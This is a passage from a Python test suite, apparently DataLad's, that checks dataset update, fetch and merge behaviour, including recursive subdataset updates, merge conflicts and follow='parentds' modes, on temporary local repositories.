path='whatever')\n assert_result_count(res, 1, status='ok', type='dataset')\n assert_result_count(res, 1, status='ok', 
path=dest.path)\n # valid path and no recursion only updates the parent\n res = dest.update(path='subm 1')\n assert_result_count(res, 1, status='ok', type='dataset')\n assert_result_count(res, 1, status='ok', path=dest.path)\n # valid path and recursion updates matching\n res = dest.update(recursive=True, path='subm 1')\n assert_result_count(res, 2, status='ok', type='dataset')\n assert_result_count(res, 1, status='ok', path=dest.path)\n assert_result_count(res, 1, status='ok', path=str(dest.pathobj / 'subm 1'))\n # additional invalid path doesn't hurt\n res = dest.update(recursive=True, path=['subm 1', 'mike'])\n assert_result_count(res, 2, status='ok', type='dataset')\n # full match\n res = dest.update(recursive=True, path=['subm 1', '2'])\n assert_result_count(res, 3, status='ok', type='dataset')\n\n # test that update doesn't crash if we specify only a single path (submod) to\n # operate on\n with chpwd(dest.path):\n # in 0.11.x it would be a single result since \"pwd\" dataset is not\n # considered, and would be relative path (as specified).\n # In 0.12.0 - it would include implicit pwd dataset, and paths would be absolute\n res_update = update(path=['subm 1'], recursive=True)\n assert_result_count(res_update, 2)\n for p in dest.path, str(dest.pathobj / 'subm 1'):\n assert_in_results(res_update, path=p, action='update', status='ok', type='dataset')\n\n # and with merge we would also try to save (but there would be no changes)\n res_merge = update(path=['subm 1'], recursive=True, merge=True)\n assert_result_count(res_merge, 2, action='update')\n # 2 of \"updates\" really.\n assert_in_results(res_merge, action='update', status='ok', type='dataset')\n assert_in_results(res_merge, action='save', status='notneeded', type='dataset')\n\n # smoke-test if recursive update doesn't fail if submodule is removed\n # and that we can run it from within a dataset without providing it\n # explicitly\n assert_result_count(\n dest.remove('subm 1'), 1,\n status='ok', action='remove', path=opj(dest.path, 'subm 1'))\n with chpwd(dest.path):\n assert_result_count(\n update(recursive=True), 2,\n status='ok', type='dataset')\n assert_result_count(\n dest.update(merge=True, recursive=True), 2,\n action='update', status='ok', type='dataset')\n\n # and now test recursive update with merging in differences\n create_tree(opj(source.path, '2'), {'load.dat': 'heavy'})\n source.save(opj('2', 'load.dat'),\n message=\"saving changes within subm2\",\n recursive=True)\n assert_result_count(\n dest.update(merge=True, recursive=True), 2,\n action='update', status='ok', type='dataset')\n # and now we can get new file\n dest.get(opj('2', 'load.dat'))\n ok_file_has_content(opj(dest.path, '2', 'load.dat'), 'heavy')\n\n\n@with_tempfile\n@with_tempfile\ndef test_update_git_smoke(src_path=None, dst_path=None):\n # Apparently was just failing on git repos for basic lack of coverage, hence this quick test\n ds = Dataset(src_path).create(annex=False)\n target = install(\n dst_path, source=src_path,\n result_xfm='datasets', return_type='item-or-list')\n create_tree(ds.path, {'file.dat': '123'})\n ds.save('file.dat')\n assert_result_count(\n target.update(recursive=True, merge=True), 1,\n action='update', status='ok', type='dataset')\n ok_file_has_content(opj(target.path, 'file.dat'), '123')\n\n\n@slow # ~9s\n@with_tempfile(mkdir=True)\ndef test_update_fetch_all(path=None):\n path = Path(path)\n remote_1 = str(path / \"remote_1\")\n remote_2 = str(path / \"remote_2\")\n\n ds = Dataset(path / \"src\").create()\n src = ds.repo.path\n\n 
ds_rmt1 = clone(source=src, path=remote_1)\n ds_rmt2 = clone(source=src, path=remote_2)\n\n ds.siblings('add', name=\"sibling_1\", url=remote_1)\n ds.siblings('add', name=\"sibling_2\", url=remote_2)\n\n # modify the remotes:\n (ds_rmt1.pathobj / \"first.txt\").write_text(\"some file load\")\n ds_rmt1.save()\n\n # TODO: Modify an already present file!\n\n (ds_rmt2.pathobj / \"second.txt\").write_text(\"different file load\")\n ds_rmt2.save()\n\n # Let's init some special remote which we couldn't really update/fetch\n if not dl_cfg.get('datalad.tests.dataladremote'):\n ds.repo.init_remote(\n 'datalad',\n ['encryption=none', 'type=external', 'externaltype=datalad'])\n # fetch all remotes\n assert_result_count(\n ds.update(), 1, status='ok', type='dataset')\n\n # no merge, so changes are not in active branch:\n assert_not_in(\"first.txt\",\n ds.repo.get_files(ds.repo.get_active_branch()))\n assert_not_in(\"second.txt\",\n ds.repo.get_files(ds.repo.get_active_branch()))\n # but we know the changes in remote branches:\n assert_in(\"first.txt\", ds.repo.get_files(\"sibling_1/\" + DEFAULT_BRANCH))\n assert_in(\"second.txt\", ds.repo.get_files(\"sibling_2/\" + DEFAULT_BRANCH))\n\n # no merge strategy for multiple remotes yet:\n # more clever now, there is a tracking branch that provides a remote\n #assert_raises(NotImplementedError, ds.update, merge=True)\n\n # merge a certain remote:\n assert_result_count(\n ds.update(sibling='sibling_1', merge=True),\n 1, action='update', status='ok', type='dataset')\n\n # changes from sibling_2 still not present:\n assert_not_in(\"second.txt\",\n ds.repo.get_files(ds.repo.get_active_branch()))\n # changes from sibling_1 merged:\n assert_in(\"first.txt\",\n ds.repo.get_files(ds.repo.get_active_branch()))\n # it's known to annex, but has no content yet:\n annexprops = ds.repo.get_file_annexinfo(\n \"first.txt\", eval_availability=True)\n annexprops['key'] # blows if unknown\n eq_(False, annexprops['has_content'])\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_newthings_coming_down(originpath=None, destpath=None):\n origin = GitRepo(originpath, create=True)\n create_tree(originpath, {'load.dat': 'heavy'})\n Dataset(originpath).save('load.dat')\n ds = install(\n source=originpath, path=destpath,\n result_xfm='datasets', return_type='item-or-list')\n assert_is_instance(ds.repo, GitRepo)\n assert_in(DEFAULT_REMOTE, ds.repo.get_remotes())\n # turn origin into an annex\n origin = AnnexRepo(originpath, create=True)\n # clone doesn't know yet\n assert_false(knows_annex(ds.path))\n # but after an update it should\n # no merge, only one sibling, no parameters should be specific enough\n assert_result_count(ds.update(), 1, status='ok', type='dataset')\n assert(knows_annex(ds.path))\n # no branches appeared\n eq_(ds.repo.get_branches(), [DEFAULT_BRANCH])\n # now merge, and get an annex\n assert_result_count(ds.update(merge=True),\n 1, action='update', status='ok', type='dataset')\n assert_in('git-annex', ds.repo.get_branches())\n assert_is_instance(ds.repo, AnnexRepo)\n # should be fully functional\n testfname = opj(ds.path, 'load.dat')\n assert_false(ds.repo.file_has_content(testfname))\n ds.get('.')\n ok_file_has_content(opj(ds.path, 'load.dat'), 'heavy')\n # check that a new tag comes down\n origin.tag('first!')\n assert_result_count(ds.update(), 1, status='ok', type='dataset')\n eq_(ds.repo.get_tags(output='name')[0], 'first!')\n\n # and now we destroy the remote annex\n origin.call_git(['config', '--remove-section', 'annex'])\n 
rmtree(opj(origin.path, '.git', 'annex'), chmod_files=True)\n origin.call_git(['branch', '-D', 'git-annex'])\n origin = GitRepo(originpath)\n assert_false(knows_annex(originpath))\n\n # and update the local clone\n # for now this should simply not fail (see gh-793), later might be enhanced to a\n # graceful downgrade\n before_branches = ds.repo.get_branches()\n ok_(any(\"git-annex\" in b\n for b in ds.repo.get_remote_branches()))\n assert_result_count(ds.update(), 1, status='ok', type='dataset')\n eq_(before_branches, ds.repo.get_branches())\n # annex branch got pruned\n assert_false(any(\"git-annex\" in b\n for b in ds.repo.get_remote_branches()))\n # check that a new tag comes down even if repo types mismatch\n origin.tag('second!')\n assert_result_count(ds.update(), 1, status='ok', type='dataset')\n eq_(ds.repo.get_tags(output='name')[-1], 'second!')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_update_volatile_subds(originpath=None, otherpath=None, destpath=None):\n origin = Dataset(originpath).create()\n repo = origin.repo\n if repo.is_managed_branch() and repo.git_annex_version <= \"8.20201129\":\n # Fails before git-annex's fd161da2c (adjustTree: Consider submodule\n # deletions, 2021-01-06).\n raise SkipTest(\n \"On adjusted branch, test requires fix in more recent git-annex\")\n ds = install(\n source=originpath, path=destpath,\n result_xfm='datasets', return_type='item-or-list')\n # as a submodule\n sname = 'subm 1'\n osm1 = origin.create(sname)\n assert_result_count(ds.update(), 1, status='ok', type='dataset')\n # nothing without a merge, no inappropriate magic\n assert_not_in(sname, ds.subdatasets(result_xfm='relpaths'))\n assert_result_count(ds.update(merge=True),\n 1, action='update', status='ok', type='dataset')\n # and we should be able to do update with recursive invocation\n assert_result_count(ds.update(merge=True, recursive=True),\n 1, action='update', status='ok', type='dataset')\n # known, and placeholder exists\n assert_in(sname, ds.subdatasets(result_xfm='relpaths'))\n ok_(exists(opj(ds.path, sname)))\n\n # remove from origin\n origin.remove(sname, reckless='availability')\n assert_result_count(ds.update(merge=True),\n 1, action='update', status='ok', type='dataset')\n # gone locally, wasn't checked out\n assert_not_in(sname, ds.subdatasets(result_xfm='relpaths'))\n assert_false(exists(opj(ds.path, sname)))\n\n # re-introduce at origin\n osm1 = origin.create(sname)\n create_tree(osm1.path, {'load.dat': 'heavy'})\n origin.save(opj(osm1.path, 'load.dat'))\n assert_result_count(ds.update(merge=True),\n 1, action='update', status='ok', type='dataset')\n # grab new content of uninstall subdataset, right away\n ds.get(opj(ds.path, sname, 'load.dat'))\n ok_file_has_content(opj(ds.path, sname, 'load.dat'), 'heavy')\n\n # modify ds and subds at origin\n create_tree(origin.path, {'mike': 'this', sname: {'probe': 'little'}})\n origin.save(recursive=True)\n assert_repo_status(origin.path)\n\n # updates for both datasets should come down the pipe\n assert_result_count(ds.update(merge=True, recursive=True),\n 2, action='update', status='ok', type='dataset')\n assert_repo_status(ds.path)\n\n # now remove just-installed subdataset from origin again\n origin.remove(sname, reckless='kill')\n assert_not_in(sname, origin.subdatasets(result_xfm='relpaths'))\n assert_in(sname, ds.subdatasets(result_xfm='relpaths'))\n # merge should disconnect the installed subdataset, but leave the actual\n # ex-subdataset alone\n 
assert_result_count(ds.update(merge=True, recursive=True),\n 1, action='update', type='dataset')\n assert_not_in(sname, ds.subdatasets(result_xfm='relpaths'))\n ok_file_has_content(opj(ds.path, sname, 'load.dat'), 'heavy')\n ok_(Dataset(opj(ds.path, sname)).is_installed())\n\n # now remove the now disconnected subdataset for further tests\n remove(dataset=op.join(ds.path, sname), reckless='kill')\n assert_repo_status(ds.path)\n\n # new separate subdataset, not within the origin dataset\n otherds = Dataset(otherpath).create()\n # install separate dataset as a submodule\n ds.install(source=otherds.path, path='other')\n create_tree(otherds.path, {'brand': 'new'})\n otherds.save()\n assert_repo_status(otherds.path)\n # pull in changes\n res = ds.update(merge=True, recursive=True)\n assert_result_count(\n res, 2, status='ok', action='update', type='dataset')\n # the next is to check for #2858\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_reobtain_data(originpath=None, destpath=None):\n origin = Dataset(originpath).create()\n ds = install(\n source=originpath, path=destpath,\n result_xfm='datasets', return_type='item-or-list')\n # no harm\n assert_result_count(ds.update(merge=True, reobtain_data=True),\n 1, action=\"update\", status=\"ok\")\n # content\n create_tree(origin.path, {'load.dat': 'heavy'})\n origin.save(opj(origin.path, 'load.dat'))\n # update does not bring data automatically\n assert_result_count(ds.update(merge=True, reobtain_data=True),\n 1, action=\"update\", status=\"ok\")\n assert_in('load.dat', ds.repo.get_annexed_files())\n assert_false(ds.repo.file_has_content('load.dat'))\n # now get data\n ds.get('load.dat')\n ok_file_has_content(opj(ds.path, 'load.dat'), 'heavy')\n # new content at origin\n create_tree(origin.path, {'novel': 'but boring'})\n origin.save()\n # update must not bring in data for new file\n result = ds.update(merge=True, reobtain_data=True)\n assert_in_results(result, action='get', status='notneeded')\n\n ok_file_has_content(opj(ds.path, 'load.dat'), 'heavy')\n assert_in('novel', ds.repo.get_annexed_files())\n assert_false(ds.repo.file_has_content('novel'))\n # modify content at origin\n os.remove(opj(origin.path, 'load.dat'))\n create_tree(origin.path, {'load.dat': 'light'})\n origin.save()\n # update must update file with existing data, but leave empty one alone\n res = ds.update(merge=True, reobtain_data=True)\n assert_result_count(res, 1, status='ok', type='dataset', action='update')\n assert_result_count(res, 1, status='ok', type='file', action='get')\n ok_file_has_content(opj(ds.path, 'load.dat'), 'light')\n assert_false(ds.repo.file_has_content('novel'))\n\n\n@with_tempfile(mkdir=True)\ndef test_multiway_merge(path=None):\n # prepare ds with two siblings, but no tracking branch\n ds = Dataset(op.join(path, 'ds_orig')).create()\n r1 = AnnexRepo(path=op.join(path, 'ds_r1'), git_opts={'bare': True})\n r2 = GitRepo(path=op.join(path, 'ds_r2'), git_opts={'bare': True})\n ds.siblings(action='add', name='r1', url=r1.path)\n ds.siblings(action='add', name='r2', url=r2.path)\n assert_status('ok', ds.push(to='r1'))\n # push unlike publish reports on r2 not being an annex remote with a\n # 'notneeded'\n assert_status(('ok', 'notneeded'), ds.push(to='r2'))\n # just a fetch should be no issue\n assert_status('ok', ds.update())\n # ATM we do not support multi-way merges\n assert_status('impossible', ds.update(merge=True, on_failure='ignore'))\n\n\ndef test_unrelated_history_merge(tmp_path):\n # prepare two 
independent datasets and try merging one into another\n ds = Dataset(tmp_path / 'ds').create()\n repo = AnnexRepo(tmp_path / 'repo')\n f = (tmp_path / 'repo' / 'file.dat')\n f.write_text(\"data\")\n repo.add(str(f))\n repo.commit()\n # ATM we do not do any checks and allow such addition\n assert_status('ok', ds.siblings(action='add', name='repo', url=repo.path))\n res = ds.update(how='merge', on_failure='ignore')\n # ATM we do not have any special handling, just that the first result record\n # would have that error in \"message\" field\n assert_status('error', res[0])\n assert_in('refusing to merge unrelated histories', res[0]['message'])\n\n\n# `git annex sync REMOTE` rather than `git merge TARGET` is used on an\n# adjusted branch, so we don't give an error if TARGET can't be\n# determined.\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_merge_no_merge_target(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n assert_repo_status(ds_src.path)\n ds_clone.repo.checkout(DEFAULT_BRANCH, options=[\"-bnew\"])\n res = ds_clone.update(merge=True, on_failure=\"ignore\")\n assert_in_results(res, status=\"impossible\", action=\"update\")\n\n\n# `git annex sync REMOTE` is used on an adjusted branch, but this error\n# depends on `git merge TARGET` being used.\n@skip_if_adjusted_branch\n@slow # 17sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_merge_conflict(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"src\").create()\n ds_src_s0 = ds_src.create(\"s0\")\n ds_src_s1 = ds_src.create(\"s1\")\n ds_src.save()\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_s0 = Dataset(path / \"clone\" / \"s0\")\n ds_clone_s1 = Dataset(path / \"clone\" / \"s1\")\n\n (ds_src.pathobj / \"foo\").write_text(\"src content\")\n ds_src.save(to_git=True)\n\n (ds_clone.pathobj / \"foo\").write_text(\"clone content\")\n ds_clone.save(to_git=True)\n\n # Top-level merge failure\n res = ds_clone.update(merge=True, on_failure=\"ignore\")\n assert_in_results(res, action=\"merge\", status=\"error\")\n assert_in_results(res, action=\"update\", status=\"error\")\n # Deal with the conflicts. 
Note that save() won't handle this gracefully\n # because it will try to commit with a pathspec, which git doesn't allow\n # during a merge.\n ds_clone.repo.call_git([\"checkout\", \"--theirs\", \"--\", \"foo\"])\n ds_clone.repo.call_git([\"add\", \"--\", \"foo\"])\n ds_clone.repo.call_git([\"commit\", \"--no-edit\"])\n assert_repo_status(ds_clone.path)\n\n # Top-level and subdataset merge failure\n (ds_src_s0.pathobj / \"foo\").write_text(\"src s0 content\")\n (ds_src_s1.pathobj / \"foo\").write_text(\"no conflict\")\n ds_src.save(recursive=True, to_git=True)\n\n (ds_clone_s0.pathobj / \"foo\").write_text(\"clone s0 content\")\n ds_clone.save(recursive=True, to_git=True)\n res = ds_clone.update(merge=True, recursive=True, on_failure=\"ignore\")\n assert_result_count(res, 2, action=\"merge\", status=\"error\")\n assert_result_count(res, 2, action=\"update\", status=\"error\")\n assert_in_results(res, action=\"merge\", status=\"ok\",\n path=ds_clone_s1.path)\n assert_in_results(res, action=\"update\", status=\"ok\",\n path=ds_clone_s1.path)\n # No saving happens if there's a top-level conflict.\n assert_repo_status(ds_clone.path,\n modified=[ds_clone_s0.path, ds_clone_s1.path])\n\n\n# `git annex sync REMOTE` is used on an adjusted branch, but this error\n# depends on `git merge TARGET` being used.\n@skip_if_adjusted_branch\n@slow # 13sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_merge_conflict_in_subdataset_only(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"src\").create()\n ds_src_sub_conflict = ds_src.create(\"sub_conflict\")\n ds_src_sub_noconflict = ds_src.create(\"sub_noconflict\")\n ds_src.save()\n\n # Set up a scenario where one subdataset has a conflict between the remote\n # and local version, but the parent dataset does not have a conflict\n # because it hasn't recorded the subdataset state.\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_sub_conflict = Dataset(path / \"clone\" / \"sub_conflict\")\n ds_clone_sub_noconflict = Dataset(path / \"clone\" / \"sub_noconflict\")\n\n (ds_src_sub_conflict.pathobj / \"foo\").write_text(\"src content\")\n ds_src_sub_conflict.save(to_git=True)\n\n (ds_clone_sub_conflict.pathobj / \"foo\").write_text(\"clone content\")\n ds_clone_sub_conflict.save(to_git=True)\n\n (ds_src_sub_noconflict.pathobj / \"foo\").write_text(\"src content\")\n ds_src_sub_noconflict.save()\n\n res = ds_clone.update(merge=True, recursive=True, on_failure=\"ignore\")\n assert_in_results(res, action=\"merge\", status=\"error\",\n path=ds_clone_sub_conflict.path)\n assert_in_results(res, action=\"merge\", status=\"ok\",\n path=ds_clone_sub_noconflict.path)\n assert_in_results(res, action=\"save\", status=\"ok\",\n path=ds_clone.path)\n # We saved the subdataset without a conflict...\n assert_repo_status(ds_clone_sub_noconflict.path)\n # ... 
but the one with the conflict leaves it for the caller to handle.\n ok_(ds_clone_sub_conflict.repo.call_git(\n [\"ls-files\", \"--unmerged\", \"--\", \"foo\"], read_only=True).strip())\n\n\n# `git annex sync REMOTE` is used on an adjusted branch, but this error\n# depends on `git merge --ff-only ...` being used.\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_merge_ff_only(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"src\").create()\n ds_clone_ff = install(source=ds_src.path, path=path / \"clone_ff\",\n result_xfm=\"datasets\")\n\n ds_clone_nonff = install(source=ds_src.path, path=path / \"clone_nonff\",\n result_xfm=\"datasets\")\n\n (ds_clone_nonff.pathobj / \"foo\").write_text(\"local change\")\n ds_clone_nonff.save(recursive=True)\n\n (ds_src.pathobj / \"bar\").write_text(\"remote change\")\n ds_src.save(recursive=True)\n\n assert_in_results(\n ds_clone_ff.update(merge=\"ff-only\", on_failure=\"ignore\"),\n action=\"merge\", status=\"ok\")\n\n # ff-only prevents a non-fast-forward ...\n assert_in_results(\n ds_clone_nonff.update(merge=\"ff-only\", on_failure=\"ignore\"),\n action=\"merge\", status=\"error\")\n # ... that would work with \"any\".\n assert_in_results(\n ds_clone_nonff.update(merge=\"any\", on_failure=\"ignore\"),\n action=\"merge\", status=\"ok\")\n\n\n@slow # 11sec on Yarik's laptop\n@with_tempfile(mkdir=True)\ndef test_merge_follow_parentds_subdataset_other_branch(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n on_adjusted = ds_src.repo.is_managed_branch()\n ds_src_subds = ds_src.create(\"subds\")\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_subds = Dataset(ds_clone.pathobj / \"subds\")\n\n ds_src_subds.repo.call_git([\"checkout\", \"-b\", \"other\"])\n (ds_src_subds.pathobj / \"foo\").write_text(\"foo content\")\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n res = ds_clone.update(merge=True, follow=\"parentds\", recursive=True,\n on_failure=\"ignore\")\n if on_adjusted:\n # Our git-annex sync based on approach on adjusted branches is\n # incompatible with follow='parentds'.\n assert_in_results(res, action=\"update\", status=\"impossible\")\n return\n else:\n assert_in_results(res, action=\"update\", status=\"ok\")\n eq_(ds_clone.repo.get_hexsha(), ds_src.repo.get_hexsha())\n ok_(ds_clone_subds.repo.is_under_annex(\"foo\"))\n\n (ds_src_subds.pathobj / \"bar\").write_text(\"bar content\")\n ds_src.save(recursive=True)\n ds_clone_subds.repo.checkout(DEFAULT_BRANCH, options=[\"-bnew\"])\n ds_clone.update(merge=True, follow=\"parentds\", recursive=True)\n if not on_adjusted:\n eq_(ds_clone.repo.get_hexsha(), ds_src.repo.get_hexsha())\n\n\n# This test depends on the source repo being an un-adjusted branch.\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_merge_follow_parentds_subdataset_adjusted_warning(path=None):\n path = Path(path)\n\n ds_src = Dataset(path / \"source\").create()\n ds_src_subds = ds_src.create(\"subds\")\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_subds = Dataset(ds_clone.pathobj / \"subds\")\n maybe_adjust_repo(ds_clone_subds.repo)\n # Note: Were we to save ds_clone here, we would get a merge conflict in the\n # top repo for the submodule (even if using 'git annex sync' rather than\n # 'git merge').\n\n ds_src_subds.repo.call_git([\"checkout\", DEFAULT_BRANCH + \"^0\"])\n (ds_src_subds.pathobj / 
\"foo\").write_text(\"foo content\")\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n assert_in_results(\n ds_clone.update(merge=True, recursive=True, follow=\"parentds\",\n on_failure=\"ignore\"),\n status=\"impossible\",\n path=ds_clone_subds.path,\n action=\"update\")\n eq_(ds_clone.repo.get_hexsha(), ds_src.repo.get_hexsha())\n\n\n@slow # 12 + 21sec on Yarik's laptop\[email protected](\"on_adjusted\", [True, False])\n# Skip non-adjusted case for systems that only support adjusted branches.\n@skip_if_adjusted_branch\n@with_tempfile(mkdir=True)\ndef test_merge_follow_parentds_subdataset_detached(path=None, *, on_adjusted):\n if on_adjusted and DEFAULT_REMOTE != \"origin\" and \\\n external_versions['cmd:annex'] <= \"8.20210330\":\n raise SkipTest(\n \"'git annex init' with adjusted branch currently fails \"\n \"due to hard-coded 'origin'\")\n\n # Note: For the adjusted case, this is not much more than a smoke test that\n # on an adjusted branch we fail sensibly. The resulting state is not easy\n # to reason about nor desirable.\n path = Path(path)\n # $path/source/s0/s1\n # The additional dataset level is to gain some confidence that this works\n # for nested datasets.\n ds_src = Dataset(path / \"source\").create()\n ds_src_s0 = ds_src.create(\"s0\")\n ds_src_s1 = ds_src_s0.create(\"s1\")\n ds_src.save(recursive=True)\n if on_adjusted:\n # Note: We adjust after creating all the datasets above to avoid a bug\n # fixed in git-annex 7.20191024, specifically bbdeb1a1a (sync: Fix\n # crash when there are submodules and an adjusted branch is checked\n # out, 2019-10-23).\n for ds in [ds_src, ds_src_s0, ds_src_s1]:\n maybe_adjust_repo(ds.repo)\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_s1 = Dataset(ds_clone.pathobj / \"s0\" / \"s1\")\n\n ds_src_s1.repo.checkout(DEFAULT_BRANCH + \"^0\")\n (ds_src_s1.pathobj / \"foo\").write_text(\"foo content\")\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n res = ds_clone.update(merge=True, recursive=True, follow=\"parentds\",\n on_failure=\"ignore\")\n if on_adjusted:\n # The top-level update is okay because there is no parent revision to\n # update to.\n assert_in_results(\n res,\n status=\"ok\",\n path=ds_clone.path,\n action=\"update\")\n # The subdataset, on the other hand, is impossible.\n assert_in_results(\n res,\n status=\"impossible\",\n path=ds_clone_s1.path,\n action=\"update\")\n return\n assert_repo_status(ds_clone.path)\n\n # We brought in the revision and got to the same state of the remote.\n # Blind saving here without bringing in the current subdataset revision\n # would have resulted in a new commit in ds_clone that reverting the\n # last subdataset ID recorded in ds_src.\n eq_(ds_clone.repo.get_hexsha(), ds_src.repo.get_hexsha())\n\n # Record a revision in the parent and then move HEAD away from it so that\n # the explicit revision fetch fails.\n (ds_src_s1.pathobj / \"bar\").write_text(\"bar content\")\n ds_src.save(recursive=True)\n ds_src_s1.repo.checkout(DEFAULT_BRANCH)\n # This is the default, but just in case:\n ds_src_s1.repo.config.set(\"uploadpack.allowAnySHA1InWant\", \"false\",\n scope=\"local\")\n # Configure the fetcher to use v0 because Git defaults to v2 as of\n # v2.26.0, which allows fetching unadvertised objects regardless\n # of the value of uploadpack.allowAnySHA1InWant.\n ds_clone_s1.repo.config.set(\"protocol.version\", \"0\", 
scope=\"local\")\n res = ds_clone.update(merge=True, recursive=True, follow=\"parentds\",\n on_failure=\"ignore\")\n # The fetch with the explicit ref fails because it isn't advertised.\n assert_in_results(\n res,\n status=\"impossible\",\n path=ds_clone_s1.path,\n action=\"update\")\n\n # Back to the detached head.\n ds_src_s1.repo.checkout(\"HEAD@{1}\")\n # Set up a case where update() will not resolve the sibling.\n ds_clone_s1.repo.call_git([\"branch\", \"--unset-upstream\"])\n ds_clone_s1.config.reload(force=True)\n ds_clone_s1.repo.call_git([\"remote\", \"add\", \"other\", ds_src_s1.path])\n res = ds_clone.update(recursive=True, follow=\"parentds\",\n on_failure=\"ignore\")\n # In this case, update() won't abort if we call with merge=False, but\n # it does if the revision wasn't brought down in the `fetch(all_=True)`\n # call.\n assert_in_results(\n res,\n status=\"impossible\",\n path=ds_clone_s1.path,\n action=\"update\")\n\n\n@with_tempfile(mkdir=True)\ndef test_update_unborn_master(path=None):\n ds_a = Dataset(op.join(path, \"ds-a\")).create()\n ds_a.repo.call_git([\"branch\", \"-m\", DEFAULT_BRANCH, \"other\"])\n ds_a.repo.checkout(DEFAULT_BRANCH, options=[\"--orphan\"])\n ds_b = install(source=ds_a.path, path=op.join(path, \"ds-b\"))\n\n ds_a.repo.checkout(\"other\")\n (ds_a.pathobj / \"foo\").write_text(\"content\")\n ds_a.save()\n\n # clone() will try to switch away from an unborn branch if there\n # is another ref available. Reverse these efforts so that we can\n # test that update() fails reasonably here because we should still\n # be able to update from remotes that datalad didn't clone.\n ds_b.repo.update_ref(\"HEAD\", \"refs/heads/\" + DEFAULT_BRANCH,\n symbolic=True)\n assert_false(ds_b.repo.commit_exists(\"HEAD\"))\n assert_status(\"impossible\",\n ds_b.update(merge=True, on_failure=\"ignore\"))\n\n ds_b.repo.checkout(\"other\")\n assert_status(\"ok\",\n ds_b.update(merge=True, on_failure=\"ignore\"))\n eq_(ds_a.repo.get_hexsha(), ds_b.repo.get_hexsha())\n\n\n@slow # ~25s\n@with_tempfile(mkdir=True)\ndef test_update_follow_parentds_lazy(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n ds_src_s0 = ds_src.create(\"s0\")\n ds_src_s0_s0 = ds_src_s0.create(\"s0\")\n ds_src_s0.create(\"s1\")\n ds_src_s1 = ds_src.create(\"s1\")\n ds_src.create(\"s2\")\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_clone_s0 = Dataset(ds_clone.pathobj / \"s0\")\n ds_clone_s0_s0 = Dataset(ds_clone.pathobj / \"s0\" / \"s0\")\n ds_clone_s0_s1 = Dataset(ds_clone.pathobj / \"s0\" / \"s1\")\n ds_clone_s1 = Dataset(ds_clone.pathobj / \"s1\")\n ds_clone_s2 = Dataset(ds_clone.pathobj / \"s2\")\n\n (ds_src_s0_s0.pathobj / \"foo\").write_text(\"in s0 s0\")\n ds_src_s0_s0.save()\n (ds_src_s1.pathobj / \"foo\").write_text(\"in s1\")\n ds_src.save(recursive=True)\n # State:\n # .\n # |-- s0\n # | |-- s0\n # | `-- s1 * matches registered commit\n # |-- s1\n # `-- s2 * matches registered commit\n res = ds_clone.update(follow=\"parentds-lazy\", merge=True, recursive=True,\n on_failure=\"ignore\")\n on_adjusted = ds_clone.repo.is_managed_branch()\n # For adjusted branches, follow=parentds* bails with an impossible result,\n # so the s0 update doesn't get brought in and s0_s0 also matches the\n # registered commit.\n n_notneeded_expected = 3 if on_adjusted else 2\n assert_result_count(res, n_notneeded_expected,\n action=\"update\", 
status=\"notneeded\")\n assert_in_results(res, action=\"update\", status=\"notneeded\",\n path=ds_clone_s0_s1.repo.path)\n assert_in_results(res, action=\"update\", status=\"notneeded\",\n path=ds_clone_s2.repo.path)\n if on_adjusted:\n assert_in_results(res, action=\"update\", status=\"notneeded\",\n path=ds_clone_s0_s0.repo.path)\n assert_repo_status(ds_clone.path,\n modified=[ds_clone_s0.repo.path,\n ds_clone_s1.repo.path])\n else:\n assert_repo_status(ds_clone.path)\n\n\n@slow # ~10s\n@with_tempfile(mkdir=True)\ndef test_update_follow_parentds_lazy_other_branch(path=None):\n path = Path(path)\n ds_src = Dataset(path / \"source\").create()\n ds_src_sub = ds_src.create(\"sub\")\n ds_src_sub.repo.checkout(DEFAULT_BRANCH, options=[\"-bother\"])\n (ds_src_sub.pathobj / \"foo\").write_text(\"on other branch\")\n ds_src_sub.save()\n ds_src_sub.repo.checkout(DEFAULT_BRANCH)\n ds_src.save(recursive=True)\n assert_repo_status(ds_src.path)\n\n ds_clone = install(source=ds_src.path, path=path / \"clone\",\n recursive=True, result_xfm=\"datasets\")\n ds_src_sub.repo.checkout(\"other\")\n ds_src.save(recursive=True)\n\n with patch(\"datalad.support.gitrepo.GitRepo.fetch\") as fetch_cmd:\n ds_clone.update(follow=\"parentds\", merge=\"ff-only\",\n recursive=True, on_failure=\"ignore\")\n eq_(fetch_cmd.call_count, 2)\n\n # With parentds-lazy, an unneeded fetch call in the subdataset is dropped.\n with patch(\"datalad.support.gitrepo.GitRepo.fetch\") as fetch_cmd:\n ds_clone.update(follow=\"parentds-lazy\", 